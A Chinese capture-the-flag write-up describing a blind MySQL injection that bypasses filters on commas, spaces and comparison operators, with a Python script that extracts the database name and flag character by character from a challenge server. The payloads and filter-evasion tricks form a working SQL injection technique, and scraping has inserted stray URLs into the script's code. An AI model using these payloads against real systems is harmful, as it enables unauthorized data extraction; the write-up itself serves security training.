CTF_WEB_Writeup|记一次MySQL注入绕过
来源于今天一位朋友叫我帮忙看的题目
文章图片
查看源码发现提示
文章图片
存在过滤且,
limit
参数只能为单个数字文章图片
文章图片
fuzz一下sql注入关键字看看都过滤了哪些字符
文章图片
文章图片
文章图片
直接在
class
参数插入exp(100)
回显正常,插入exp(1000)
发现返回database error
;说明此处sql注入可直接插入执行,其次如果sql语句执行错误会返回报错提示;那么就可以做
布尔盲注
了,但是比较棘手的是过滤了逗号,
;不能使用if
进行条件判断;绕过逗号的方法from x for y
不能在if
中使用。if
无法使用可以用case when [express] then [x] else [y] end
代替空格
绕过可以使用括号()
或者%0a
=
、like
、regexp
被过滤可以用in
(不过in
对字符大小写不敏感)
class=case%0awhen%0a(2)in(1)%0athen%0aexp(1000)else%0a1%0aend&limit=4
文章图片
文章图片
编写脚本
from urllib.parse import urlencode
from urllib.parse import unquote
import requestsburp0_url = "http://123.60.32.152:80/"
burp0_headers = {
"Content-Type": "application/x-www-form-urlencoded"}
all_str = "0123456789abcdefghijklmnopqrstuvwxyz!\"#$%&\\'()*+,-./:;
<=>?@[\\]^_`{|}~"flag = ''
for leng in range(1,50):
for char in all_str:
payload = "case%0awhen%0amid(database()from({})for(1))%0ain%0a(0x{})%0athen%0aexp(1000)%0aelse%0a1%0aend".format(leng, hex(ord(char))[2:])
#payload = "case%0awhen%0amid((select%0aflag%0afrom%0aflag)from({})for(1))%0ain%0a(0x{})%0athen%0aexp(1000)%0aelse%0a1%0aend".format(leng, hex(ord(char))[2:])
burp0_data = https://www.it610.com/article/{"class": unquote(payload), "limit": "4"}
resp = requests.post(burp0_url, headers=burp0_headers, data=https://www.it610.com/article/urlencode(burp0_data))
if'error' in resp.text:
flag += char
print(flag)
else:
continue
# print(resp.text)
# print(resp.request.body)
【CTF_WEB_Writeup|记一次MySQL注入绕过】
文章图片
得到数据名称:
babysql
直接按照前面的提示查flag
文章图片
推荐阅读
- 私有化轻量级持续集成部署方案--03-部署web服务(下)
- web网页模板|如此优秀的JS轮播图,写完老师都沉默了
- spring|spring boot项目启动websocket
- OC:|OC: WKWebView详解
- WKWebview|WKWebview js 调用oc 和oc调用js
- javaweb|基于Servlet+jsp+mysql开发javaWeb学生成绩管理系统
- webug3.0渗透基础第九、十关笔记
- 前端|web前端dya07--ES6高级语法的转化&render&vue与webpack&export
- WebSocket|WebSocket 语法解析
- webpack|webpack 配置参考(production)